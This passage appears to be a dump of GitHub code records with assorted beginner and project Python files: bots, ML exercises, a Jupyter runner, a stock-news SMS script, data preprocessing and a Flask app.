and now <= 15:\n bot.send_message(message.chat.id, f\"Temperature now is {weather}, it`s a pleasant!\")\n elif now > 15 and now <= 25:\n bot.send_message(message.chat.id, f\"Temperature now is {weather}, welcome to spring!\")\n elif now > 25:\n bot.send_message(message.chat.id, f\"Temperature now is {weather}, dress up it`s will be hot\")\n\nbot.polling()\n","repo_name":"RandyR0zz/Python_course","sub_path":"Projects/Telegram_Daily_Bot/telegram_daily_bot.py","file_name":"telegram_daily_bot.py","file_ext":"py","file_size_in_byte":3424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31790861551","text":"\"\"\"\n그럼 다솜아 이제 진정한 포켓몬 마스터가 되기 위해 도감을 완성시키도록 하여라.\n일단 네가 현재 가지고 있는 포켓몬 도감에서 포켓몬의 이름을 보면 포켓몬의 번호를 말하거나,\n포켓몬의 번호를 보면 포켓몬의 이름을 말하는 연습을 하도록 하여라. 나의 시험을 통과하면, 내가 새로 만든 도감을 주도록 하겠네.\n\"\"\"\n\nimport sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\ndigit = dict()\nalpha = dict()\n\nfor i in range(1, N+1):\n name = input().rstrip()\n digit[i] = name\n alpha[name] = i\n\nfor i in range(M):\n question = input().rstrip()\n if question.isdigit():\n print(digit[int(question)])\n else:\n print(alpha[question])\n","repo_name":"sangm1n/problem-solving","sub_path":"BOJ/1620.py","file_name":"1620.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27802882665","text":"from enum import Enum\nfrom types import TracebackType\nfrom typing import Any, Awaitable, Optional, Type, TypeVar\n\nfrom httpx import AsyncClient\n\nfrom nbr.api import JupyterAPI\nfrom nbr.kernel import Kernel\nfrom nbr.notebook import Notebook\nfrom nbr.schemas.result import RunResult\nfrom nbr.schemas.session import CreateSession, Session\nfrom nbr.utils.client import create_client, prepare_headers\nfrom nbr.utils.session import create_session, delete_session\n\nTNotebookRunner = TypeVar(\"TNotebookRunner\", bound=\"NotebookRunner\")\n\n\nclass RunnerState(Enum):\n UNOPENED = 1\n OPENED = 2\n CLOSED = 3\n\n\nclass NotebookRunner:\n def __init__(\n self,\n *,\n notebook: Notebook,\n on_notebook_start: Optional[Awaitable[Any]] = None,\n on_notebook_end: Optional[Awaitable[Any]] = None,\n jupyter_api: JupyterAPI = JupyterAPI(),\n ) -> None:\n self._state: RunnerState = RunnerState.UNOPENED\n\n self.notebook: Notebook = notebook\n\n self.on_notebook_start = on_notebook_start\n self.on_notebook_finish = on_notebook_end\n\n self.jupyter_api = jupyter_api\n\n self._client: AsyncClient = create_client(\n base_url=f\"http://{self.jupyter_api.host}:{self.jupyter_api.port}/api\",\n headers=prepare_headers(self.jupyter_api.token),\n )\n\n self._session: Session\n self._kernel: Kernel\n\n async def execute_all_cells(self) -> RunResult:\n if self._state != RunnerState.OPENED:\n raise RuntimeError(\"Create NotebookRunner instance first.\")\n\n if self.on_notebook_start:\n await self.on_notebook_start\n\n run_result = await self._kernel.execute(cells=self.notebook.cells)\n self.notebook.cells = run_result.cells\n\n if self.on_notebook_finish:\n await self.on_notebook_finish\n\n return run_result\n\n async def __aenter__(self: TNotebookRunner) -> TNotebookRunner:\n if self._state != RunnerState.UNOPENED:\n raise RuntimeError(\n \"Cannot create a NotebookRunner instance more than once.\",\n )\n\n self._state = RunnerState.OPENED\n self._session = await create_session(\n session_data=CreateSession(\n name=self.notebook.name, path=self.notebook.path\n ),\n 
client=self._client,\n )\n self._kernel = Kernel(session=self._session)\n await self._kernel.start(\n base_url=f\"{self.jupyter_api.host}:{self.jupyter_api.port}/api\"\n )\n\n return self\n\n async def __aexit__(\n self,\n exc_type: Type[BaseException],\n exc_value: BaseException,\n traceback: TracebackType,\n ) -> None:\n await delete_session(session_id=self._session.id, client=self._client)\n\n self._state = RunnerState.CLOSED\n","repo_name":"zhivykh/nbr","sub_path":"nbr/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"31977695594","text":"print('Lojas Tabajara')\npreço=float(input('Product 1 : R$ '))\nsoma=0\ndinheiro=0\ntroco=0\naux=preço\ncont=1\nwhile preço != 0 :\n cont=cont +1\n print('Product', cont,end=' ')\n preço=float(input(': R$ '))\n soma= soma + preço\n if preço == 0 :\n print('Total: R$', soma + aux)\n dinheiro=float(input('Cash: R$ '))\n troco=dinheiro - soma - aux\n print('Change: R$', troco)","repo_name":"aly50n/Python-Algoritmos-2019.2","sub_path":"lista03ex20.py","file_name":"lista03ex20.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16651283407","text":"from keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\nimport os\n\nbase_dir = 'C://DeepLearningData/dogs-vs-cats/train'\nfn = os.path.join(base_dir, 'dog.132.jpg')\n\ndatagen = ImageDataGenerator(\n height_shift_range=0.2,\n width_shift_range=0.2,\n zoom_range=0.2,\n shear_range=0.1,\n rotation_range=20,\n horizontal_flip=True\n)\n\nimage = np.expand_dims(Image.open(fn), 0)\n\naug_iter = datagen.flow(image)\naug_images = [next(aug_iter)[0].astype(np.uint8) for i in range(10)]\n\nfor i in range(10):\n plt.figure(i)\n plt.imshow(aug_images[i])\n\nplt.show()","repo_name":"tjwldnjss13/CNN","sub_path":"augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"43193206651","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n\n# # IEMOCAP data processing\n\n# The data includes video, audio and text. The videos are recorded as dialogues.\n\n\n\nimport os\nimport json\nimport re\nimport pandas as pd\n\n\ndata_path = 'D:\\\\dataset\\\\IEMOCAP_full_release\\\\IEMOCAP_full_release'\n\n\n# Get the data labels\ndef get_labels(data_path):\n    # Get the label of every utterance from each session's dialog\\\\EmoEvaluation and write the result to iemocap_label.csv\n    info_line = re.compile(r'\\[.+\\]\\n', re.IGNORECASE)\n    start_times, end_times, wav_file_names, emotions, vals, acts, doms = [], [], [], [], [], [], []\n    for sess in range(1, 6):\n        emo_evaluation_dir = data_path+'\\\\Session{}\\\\dialog\\\\EmoEvaluation\\\\'.format(sess)\n        evaluation_files = [l for l in os.listdir(emo_evaluation_dir) if 'Ses' in l]\n        for file in evaluation_files:\n            with open(emo_evaluation_dir + file) as f:\n                content = f.read()\n            info_lines = re.findall(info_line, content)\n            for line in info_lines[1:]:  # the first line is a header\n                start_end_time, wav_file_name, emotion, val_act_dom = line.strip().split('\\t')\n                start_time, end_time = start_end_time[1:-1].split('-')\n                val, act, dom = val_act_dom[1:-1].split(',')\n                val, act, dom = float(val), float(act), float(dom)\n                start_time, end_time = float(start_time), float(end_time)\n                start_times.append(start_time)\n                end_times.append(end_time)\n                wav_file_names.append(wav_file_name)\n                emotions.append(emotion)\n                vals.append(val)\n                acts.append(act)\n                doms.append(dom)\n    df_iemocap = pd.DataFrame(columns=['starttime', 'endtime', 'sentence', 'emotion', 'val', 'act', 'dom'])\n    df_iemocap['starttime'] = start_times\n    df_iemocap['endtime'] = end_times\n    df_iemocap['sentence'] = wav_file_names\n    df_iemocap['emotion'] = emotions\n    df_iemocap['val'] = vals\n    df_iemocap['act'] = acts\n    df_iemocap['dom'] = doms\n    print(df_iemocap.tail())\n    df_iemocap.to_csv(data_path+'\\\\pre_processed\\\\iemocap_label.csv', index=False) \n\n# Audio file processing (.wav)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# ## Text data processing\n# \n# Organize the text and save it as a JSON file, in the following format\n# \"Session1\": session name\n# {\"Ses01F_impro01\": file name \n# [{\"sentence\": \"Ses01F_impro01_F000\", \"startime\": \"006.2901\", \"endtime\": \"008.2357\", \"text\": \"Excuse me.\"}, utterance info: utterance id, start time, end time, text\n# {\"sentence\": \"Ses01F_impro01_M000\", \"startime\": \"007.5712\", \"endtime\": \"010.4750\", \"text\": \"Do you have your forms?\"},\n# ...],\n# \"Ses01F_impro02\": \n# [{\"sentence\": \"Ses01F_impro02_F000\", \"startime\": \"007.2688\", \"endtime\": \"016.6000\", \"text\": \"Did you get the mail? So you saw my letter?\"},\n# ...],\n# ...\n# }\n# \"Session2\":\n# {\n# ...\n# }\n# ...\ndef get_textJSON(data_path):\n    text_dir ={}\n    iemocap_filename = {}\n    for i in range(5):\n        list_path = data_path + '\\\\Session'+str(i+1)+'\\\\dialog\\\\transcriptions'\n        session_dir = {}\n        txt_list = os.listdir(list_path)\n        for txt in txt_list:\n            txt_path = os.path.join(list_path,txt)\n            with open(txt_path,'r',encoding=\"utf-8\") as f:\n                linelist = f.read().split(\"\\n\")\n                result =[]\n                for line in linelist:\n                    if len(line) > 30 and \"]:\" in line:\n                        sentence = line.split(' ')[0]\n                        startime = line.split(\" \")[1].split('-')[0][1:]\n                        endtime = line.split(\" \")[1].split('-')[1][:-2]\n                        text = line.split(\"]: \")[1]\n                        item = {\n                            'sentence':sentence,\n                            'startime':startime,\n                            'endtime':endtime,\n                            'text':text\n                        }\n                        result.append(item)\n                session_dir[txt[:-4]] = result\n        iemocap_filename['Session'+ str(i+1)] = txt_list\n        text_dir['Session'+ str(i+1)] = session_dir\n    # Save the text as JSON\n    with open('IEMOCAP_text.json', 'w') as dump_f:\n        json.dump(text_dir,dump_f)\n    # Save the file names (video, audio, text) from the IEMOCAP database\n    with open('iemocap_filename.json', 'w') as dump_f:\n        json.dump(iemocap_filename,dump_f) \n\n\n# Read the JSON file\n# with open('IEMOCAP_text.json', 'r',encoding=\"utf-8\") as load_f:\n#     text = json.load(load_f)\n# print(text['Session1'][\"Ses01F_impro01\"][0])\n\nif __name__ =='__main__':\n    # Get the labels\n    # get_labels(data_path)\n    # Get the text data\n    get_textJSON(data_path)\n","repo_name":"lishuai-lws/PretrainedMultimodal","sub_path":"IEMOCAP/dataprocess.py","file_name":"dataprocess.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21072182649","text":"from sklearn.datasets import load_iris, fetch_20newsgroups, load_boston\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import classification_report\nimport pandas as pd\nimport numpy as np\n\n\n# li = load_iris()\n# #\n# # print(li.data)\n# # print(li.target)\n# # print(li.feature_names)\n# # print(li.target_names)\n#\n# # Split the dataset: training features, test features, training targets, test targets\n# # x_train, x_test, y_train, y_test = 
train_test_split(li.data, li.target, test_size=0.25, random_state=24)\n# #\n# #\n# # x_train1, x_test1, y_train1, y_test1= train_test_split(li.data, li.target, test_size=0.25, random_state=24)\n# #\n# # print(x_train == x_train1)\n#\n#\n# # news = fetch_20newsgroups(subset='all')\n# #\n# # print(news.data)\n#\n#\n# lb = load_boston()\n#\n# print(lb.data)\n# print(lb.target)\n\n\ndef knncls():\n    \"\"\"\n    K-nearest neighbors for the check-in prediction task\n    :return: None\n    \"\"\"\n    # Load and inspect the data\n    data = pd.read_csv(\"./data/FBlocation/train.csv\")\n\n    # print(data)\n\n    # Narrow down the data range to keep the runtime manageable\n    data = data.query(\"x > 1.0 & x < 1.25 & y > 2.5 & y < 2.75\")\n\n    # Process the timestamp: split it and add some detailed date features\n    time_value = pd.to_datetime(data['time'], unit='s')\n\n    # Convert the time format so that year, month and day can be extracted\n    time_value = pd.DatetimeIndex(time_value)\n\n    # Build new features: weekday, day, hour\n    data['weekday'] = time_value.weekday\n    data['day'] = time_value.day\n    data['hour'] = time_value.hour\n\n    data = data.drop(['time'], axis=1)\n\n    # Drop check-in places that have only a few check-ins\n    place_count = data.groupby('place_id').aggregate(np.count_nonzero)\n    tf = place_count[place_count.row_id > 3].reset_index()\n\n    data = data[data['place_id'].isin(tf.place_id)]\n\n    # Extract the features and the target\n    y = data['place_id']\n\n    x = data.drop(['place_id'], axis=1)\n\n\n    # Split the data\n    x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.25)\n\n    # Standardize\n    std = StandardScaler()\n\n    x_train = std.fit_transform(x_train)\n\n    # x_test = std.fit_transform(x_test)\n    x_test = std.transform(x_test)\n\n    # estimator workflow\n    knn = KNeighborsClassifier()\n\n    # # fit the data\n    # knn.fit(x_train, y_train)\n    #\n    # # predict the results\n    #\n    # # compute the accuracy\n    # score = knn.score(x_test, y_test)\n\n    param = {\"n_neighbors\": [1, 3, 5]}\n\n    # Use grid search\n    gs = GridSearchCV(knn, param_grid=param, cv=2)\n\n    # Feed in the data\n    gs.fit(x_train, y_train)\n\n    # Accuracy on the test set\n    print(\"Accuracy on the test set:\", gs.score(x_test, y_test))\n\n    print(\"Best validation score in cross-validation:\", gs.best_score_)\n\n    print(\"Selected model:\", gs.best_estimator_)\n\n    print(\"Results for each hyperparameter and each cross-validation fold:\", gs.cv_results_)\n\n    return None\n\n\ndef navie_bayes():\n    \"\"\"\n    Naive Bayes news classification\n    :return: None\n    \"\"\"\n    # Load the news dataset\n    news = fetch_20newsgroups(subset='all')\n\n    # Split the dataset\n    x_train, x_test, y_train, y_test = train_test_split(news.data, news.target, test_size=0.25)\n\n    # Feature extraction\n    tf = TfidfVectorizer()\n\n    x_train = tf.fit_transform(x_train)\n\n    x_test = tf.transform(x_test)\n\n    # Naive Bayes classification\n    mlb = MultinomialNB(alpha=1.0)\n\n    mlb.fit(x_train, y_train)\n\n    y_predict = mlb.predict(x_test)\n\n    print(\"Predicted article categories:\", y_predict)\n\n    score = mlb.score(x_test, y_test)\n\n    print(\"Accuracy:\", score)\n\n    print(classification_report(y_test, y_predict, target_names=news.target_names))\n\n    return None\n\n\nif __name__ == \"__main__\":\n    knncls()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lmlzk/ML","sub_path":"ML_study/day_02.py","file_name":"day_02.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37012218895","text":"from tracemalloc import start\nimport torch\nfrom torch import nn\nimport random\nimport numpy as np\n\n\nclass QNet_FC(nn.Module):\n    \"\"\"\n    Use this model for non-image based inputs\n    \"\"\"\n\n    def __init__(self, obs, action_space):\n        super(QNet_FC, self).__init__()\n        self.feature_layer = nn.Sequential(\n            nn.Linear(obs, 512),\n            nn.ReLU(),\n            nn.Linear(512, 256),\n            nn.ReLU(),\n        )\n\n        self.advantage_stream = nn.Sequential(\n            nn.Linear(256, 256),\n            nn.ReLU(),\n            nn.Linear(256, action_space),\n        )\n        \n        
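# dueling DQN: this second stream estimates the scalar state value V(s); forward() recombines it with the advantage stream\n        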
self.value_stream = nn.Sequential(\n            nn.Linear(256, 256),\n            nn.ReLU(),\n            nn.Linear(256, 1),\n        )\n\n    def forward(self, x):\n        # Dueling DQN\n        features = self.feature_layer(x)\n        advantages = self.advantage_stream(features)\n        values = self.value_stream(features)\n        if advantages.dim() == 1:\n            advantage_mean = advantages.mean(dim=0, keepdim=True)\n        else:\n            advantage_mean = advantages.mean(dim=1, keepdim=True)\n        \n        return values + (advantages - advantage_mean)\n\n\nclass QNet_FC_Hyperbolic(nn.Module):\n    \"\"\"\n    Use this model for non-image based inputs\n    \"\"\"\n\n    def __init__(self, obs, action_space, number_of_gammas):\n        super(QNet_FC_Hyperbolic, self).__init__()\n        \n        self.number_of_gammas = number_of_gammas\n        \n        self.feature_layer = nn.Sequential(\n            nn.Linear(obs, 512),\n            nn.ReLU(),\n            nn.Linear(512, 256),\n            nn.ReLU(),\n        )\n        \n        self.advantages_hidden = nn.Sequential(\n            nn.Linear(256, 256),\n            nn.ReLU(),\n        )\n        \n        self.values_hidden = nn.Sequential(\n            nn.Linear(256, 256),\n            nn.ReLU(),\n        )\n\n        # nn.ModuleList (not a plain Python list) so the per-gamma heads register their parameters with the module\n        self.advantage_out_layers = nn.ModuleList()\n        self.value_out_layers = nn.ModuleList()\n        for _ in range(number_of_gammas):\n            self.advantage_out_layers.append(nn.Sequential(nn.Linear(256, action_space)))\n            self.value_out_layers.append(nn.Sequential(nn.Linear(256, 1)))\n        \n\n    def forward(self, x):\n        # Dueling DQN\n        features = self.feature_layer(x)\n        \n        advantages_hidden_out = self.advantages_hidden(features)\n        values_hidden_out = self.values_hidden(features)\n        \n        out_list = np.empty(self.number_of_gammas, dtype=torch.Tensor)\n        for gamma_num in range(self.number_of_gammas):\n            value = self.value_out_layers[gamma_num](values_hidden_out)\n            \n            advantages = self.advantage_out_layers[gamma_num](advantages_hidden_out)\n            \n            if advantages.dim() == 1:\n                advantage_mean = advantages.mean(dim=0, keepdim=True)\n            else:\n                advantage_mean = advantages.mean(dim=1, keepdim=True)\n            \n            out_list[gamma_num] = value + (advantages - advantage_mean)\n        \n        out_tensor = torch.stack(tuple(out_list))\n        \n        return out_tensor\n\n\nclass QNet_Nature_CNN(nn.Module):\n    \"\"\"\n    Use this model for image based inputs\n    \"\"\"\n\n    def __init__(self, obs, action_space):\n        super(QNet_Nature_CNN, self).__init__()\n        self.conv = nn.Sequential(\n            # If gray scale, input is 1 channel, else 3 channels\n            # nn.Conv2d(3, 32, kernel_size=3, stride=1),\n            nn.Conv2d(1, 32, kernel_size=3, stride=1),\n            nn.ReLU(),\n            nn.MaxPool2d(kernel_size=2, stride=2),\n            nn.Conv2d(32, 64, kernel_size=3, stride=1),\n            nn.ReLU(),\n            nn.MaxPool2d(kernel_size=2, stride=2),\n            nn.Conv2d(64, 64, kernel_size=3, stride=1),\n            nn.ReLU(),\n            nn.Conv2d(64, 1, kernel_size=3, stride=1),\n        )\n\n        conv_out_size = self._get_conv_out(obs)\n        self.fc = nn.Sequential(\n            nn.Linear(conv_out_size, 512), nn.ReLU(), nn.Linear(512, action_space)\n        )\n\n    def _get_conv_out(self, shape):\n        o = self.conv(torch.zeros(1, *shape.shape)).flatten().shape[0]\n        return o\n\n    def forward(self, x):\n        conv_out = self.conv(x)\n        if x.dim() == 3:\n            q_vals = self.fc(conv_out.flatten())\n        else:\n            q_vals = self.fc(conv_out.flatten(start_dim=1))\n        return q_vals\n","repo_name":"treyetzel/Multi-Agent-RL","sub_path":"source/models/idqn_models.py","file_name":"idqn_models.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43836719307","text":"\"\"\"init\n\nRevision ID: e32cf207963c\nRevises: c4d7f9729c0f\nCreate Date: 2023-06-07 11:40:35.480053\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 
'e32cf207963c'\ndown_revision = 'c4d7f9729c0f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('garage_sale',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('date', sa.Date(), nullable=False),\n sa.Column('start_time', sa.Time(), nullable=False),\n sa.Column('end_time', sa.Time(), nullable=False),\n sa.Column('street_address', sa.String(length=255), nullable=False),\n sa.Column('city', sa.String(length=255), nullable=False),\n sa.Column('state', sa.String(length=255), nullable=False),\n sa.Column('zip', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('item',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name_of_item', sa.String(length=255), nullable=False),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.Column('price', sa.Integer(), nullable=True),\n sa.Column('category', sa.String(length=255), nullable=True),\n sa.Column('image', sa.String(length=255), nullable=True),\n sa.Column('garage_sale_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['garage_sale_id'], ['garage_sale.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.add_column(sa.Column('contact_number', sa.String(length=255), nullable=True))\n batch_op.create_unique_constraint(None, ['username'])\n batch_op.create_unique_constraint(None, ['email'])\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.drop_constraint(None, type_='unique')\n batch_op.drop_constraint(None, type_='unique')\n batch_op.drop_column('contact_number')\n\n op.drop_table('item')\n op.drop_table('garage_sale')\n # ### end Alembic commands ###\n","repo_name":"michellestapp/Garage_Sale_Locator","sub_path":"backend/migrations/versions/e32cf207963c_init.py","file_name":"e32cf207963c_init.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25763862754","text":"import requests\nimport os\nfrom datetime import datetime, timedelta\nfrom twilio.rest import Client\n\n\nSTOCK_NAME = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\n\nSTOCK_ENDPOINT = \"https://www.alphavantage.co/query\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\n\nSTOCK_KEY = \"VELO2WIP9B86LL16\"\nNEWS_KEY = \"acaa5932f52f49438c934c27c8cd8046\"\n\nurl = 'https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol=IBM&apikey=demo'\nr = requests.get(url)\ndata = r.json()\n\n# TODO 1. - Get yesterday's closing stock price. Hint: You can perform list comprehensions on Python dictionaries. e.g. [new_value for (key, value) in dictionary.items()]\n\ntodays_date = datetime.today().date()\nyesterday_date = datetime.today() - timedelta(days=1)\nyesterday_date = yesterday_date.date()\n\nstock_dates = list(data[\"Time Series (Daily)\"].keys())\n\nstock_first_date_close_price = float(data[\"Time Series (Daily)\"][stock_dates[0]]['4. close'])\n\n# TODO 2. - Get the day before yesterday's closing stock price\n\nstock_second_date_close_price = float(data[\"Time Series (Daily)\"][stock_dates[1]]['4. close'])\n\n# TODO 3. - Find the positive difference between 1 and 2. e.g. 
40 - 20 = -20, but the positive difference is 20. Hint: https://www.w3schools.com/python/ref_func_abs.asp\n\nprice_diff = abs(stock_first_date_close_price - stock_second_date_close_price)\n\n# TODO 4. - Work out the percentage difference in price between closing price yesterday and closing price the day before yesterday.\n\npercentage_diff = (price_diff / stock_second_date_close_price) * 100\n\n# TODO 5. - If TODO4 percentage is greater than 5 then print(\"Get News\").\n# TODO 6. - Instead of printing (\"Get News\"), use the News API to get articles related to the COMPANY_NAME.\n\n## STEP 2: https://newsapi.org/\n# Instead of printing (\"Get News\"), actually get the first 3 news pieces for the COMPANY_NAME.\n\nnews_parameters = {\n    \"q\": \"ibm\",\n    \"from\": str(todays_date),  # the NewsAPI 'from' parameter expects a date value, not a literal string\n    \"sortBy\": \"publishedAt\",\n    \"apiKey\": NEWS_KEY,\n    \"language\": 'en',\n}\n\nnews_url = NEWS_ENDPOINT\nnews_r = requests.get(news_url, params=news_parameters)\nnews_data = news_r.json()\n\narticles = news_data[\"articles\"]\n\nnews = {}\n\nfor i in range(3):\n    title = articles[i][\"title\"]\n    description = articles[i][\"description\"]\n    news[title] = description\n\n# TODO 7. - Use Python slice operator to create a list that contains the first 3 articles. Hint: https://stackoverflow.com/questions/509211/understanding-slice-notation\n# TODO 8. - Create a new list of the first 3 article's headline and description using list comprehension.\n# TODO 9. - Send each article as a separate message via Twilio.\n\naccount_sid = \"YOUR ACCOUNT SID\"\nauth_token = os.environ.get(\"AUTH_TOKEN\")\n\nclient = Client(account_sid, auth_token)\n\nif stock_first_date_close_price >= stock_second_date_close_price:\n    for k, v in news.items():\n        message = client.messages \\\n            .create(\n            body=f\"IBM: 🔺{round(percentage_diff)}%\\nHeadline: {k}\\nBrief: {v}\",\n            from_=\"+17853775297\",\n            to=\"+48695391444\"\n        )\nelse:\n    for k, v in news.items():\n        message = client.messages \\\n            .create(\n            body=f\"IBM: 🔻{round(percentage_diff)}%\\nHeadline: {k}\\nBrief: {v}\",\n            from_=\"+17853775297\",\n            to=\"+48695391444\"\n        )\n\n## STEP 3: Use twilio.com/docs/sms/quickstart/python\n# to send a separate message with each article's title and description to your phone number.\n\n\n\n\n# Optional TODO: Format the message like this:\n\"\"\"\nTSLA: 🔺2%\nHeadline: Were Hedge Funds Right About Piling Into Tesla Inc. (TSLA)?. \nBrief: We at Insider Monkey have gone over 821 13F filings that hedge funds and prominent investors are required to file by the SEC The 13F filings show the funds' and investors' portfolio positions as of March 31st, near the height of the coronavirus market crash.\nor\n\"TSLA: 🔻5%\nHeadline: Were Hedge Funds Right About Piling Into Tesla Inc. (TSLA)?. 
\nBrief: We at Insider Monkey have gone over 821 13F filings that hedge funds and prominent investors are required to file by the SEC The 13F filings show the funds' and investors' portfolio positions as of March 31st, near the height of the coronavirus market crash.\n\"\"\"\n","repo_name":"eughrat/100daysChallenge","sub_path":"day_36/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74741406771","text":"import logging\nfrom collections import namedtuple\n\nfrom bson import DEFAULT_CODEC_OPTIONS\nfrom scrapy import Spider\nfrom scrapy.settings import Settings\nfrom twisted.internet.defer import inlineCallbacks\nfrom txmongo.connection import ConnectionPool\n\nfrom ..settings.default_settings import MONGODB_COLLECTION\nfrom ..settings.default_settings import MONGODB_DATABASE\nfrom ..utils.get_mongo_uri import get_mongo_uri\n\nlogger = logging.getLogger(__name__)\n\nTOKEN = namedtuple('twitter_token', ['client_key',\n 'client_secret'\n 'resource_owner_key',\n 'resource_owner_secret'])\n\n\nclass MongoDBStorage(object):\n\n def __init__(self, settings: Settings):\n self.settings = settings\n self.uri = get_mongo_uri(self.settings)\n self.codec_options = DEFAULT_CODEC_OPTIONS.with_options(\n unicode_decode_error_handler='ignore')\n self.cnx = None\n self.db = None\n self.coll = None\n\n @inlineCallbacks\n def open_spider(self, spider: Spider):\n self.cnx = yield ConnectionPool(\n self.uri,\n codec_options=self.codec_options\n )\n\n self.db = yield getattr(\n self.cnx,\n self.settings[MONGODB_DATABASE]\n )\n self.coll = yield getattr(\n self.db,\n self.settings[MONGODB_COLLECTION]\n )\n self.coll.with_options(codec_options=self.codec_options)\n\n logger.info(\n 'Spider opened: Open the connection to MongoDB: {}'.format(self.uri)\n )\n\n @inlineCallbacks\n def close_spider(self, spider: Spider):\n yield self.cnx.disconnect()\n logger.info(\n 'Spider closed: Close the connection to MongoDB: {}'.format(\n self.uri)\n )\n\n @inlineCallbacks\n def retrieve_token(self):\n docs = yield self.coll.find()\n return {doc.pop('_id'): doc for doc in docs}\n","repo_name":"leonardfrank/scrapy-httpoauth","sub_path":"scrapy_httpoauth/extensions/httpoauth.py","file_name":"httpoauth.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"35422549858","text":"from flask import Flask\n\nfrom thisdayinmusic import auth, api\nfrom thisdayinmusic.extensions import db, jwt, migrate\n\n\ndef create_app(config=None, testing=False, cli=False):\n \"\"\"Application factory, used to create application\n \"\"\"\n app = Flask('thisdayinmusic')\n\n configure_app(app, testing)\n configure_extensions(app, cli)\n register_blueprints(app)\n\n return app\n\n\ndef configure_app(app, testing=False):\n \"\"\"set configuration for application\n \"\"\"\n # default configuration\n app.config.from_object('thisdayinmusic.config')\n\n if testing is True:\n # override with testing config\n app.config.from_object('thisdayinmusic.configtest')\n else:\n # override with env variable, fail silently if not set\n app.config.from_envvar(\"THISDAYINMUSIC_CONFIG\", silent=True)\n\n\ndef configure_extensions(app, cli):\n \"\"\"configure flask extensions\n \"\"\"\n db.init_app(app)\n jwt.init_app(app)\n\n if cli is True:\n migrate.init_app(app, db)\n\n\ndef register_blueprints(app):\n \"\"\"register all blueprints for 
application\n \"\"\"\n app.register_blueprint(auth.views.blueprint)\n app.register_blueprint(api.views.blueprint)\n","repo_name":"Shemahmforash/api.thisdayinmusic.net","sub_path":"thisdayinmusic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12855335458","text":"from dgl.data import load_data, tu\nfrom dgl import DGLGraph, transform\nimport torch\nimport torch.utils.data\nimport numpy as np\nimport torch\nimport dgl\nimport networkx as nx\nfrom datasets.prepocessing import one_class_processing\nimport pickle\n\ndef load_cn_data(path='/Users/mtang/Documents/OCGNN/data/baseline_networkx_combinedAttr_0724.pkl'):\n a_file = open(path, \"rb\")\n data = pickle.load(a_file)\n a_file.close()\n nx_ls, label_ls = data[0], data[1]\n return nx_ls, label_ls\n\ndef loader(args, index):\n # load and preprocess dataset\n \n # data = load_data(args)\n data_ls, label_ls = load_cn_data()\n graph = data_ls[index]\n label = np.array(list(nx.get_node_attributes(graph, 'have_diag').values()))\n # print(nx.get_node_attributes(graph,'call_count').values())\n # g = dgl.from_networkx(data, node_attrs=['tariftype', 'call_count', 'total_call_len',\n # 'lat', 'lon', 'unique_locations_visited', 'avg_call_len',\n # 'sub_or_ob', 'missing', 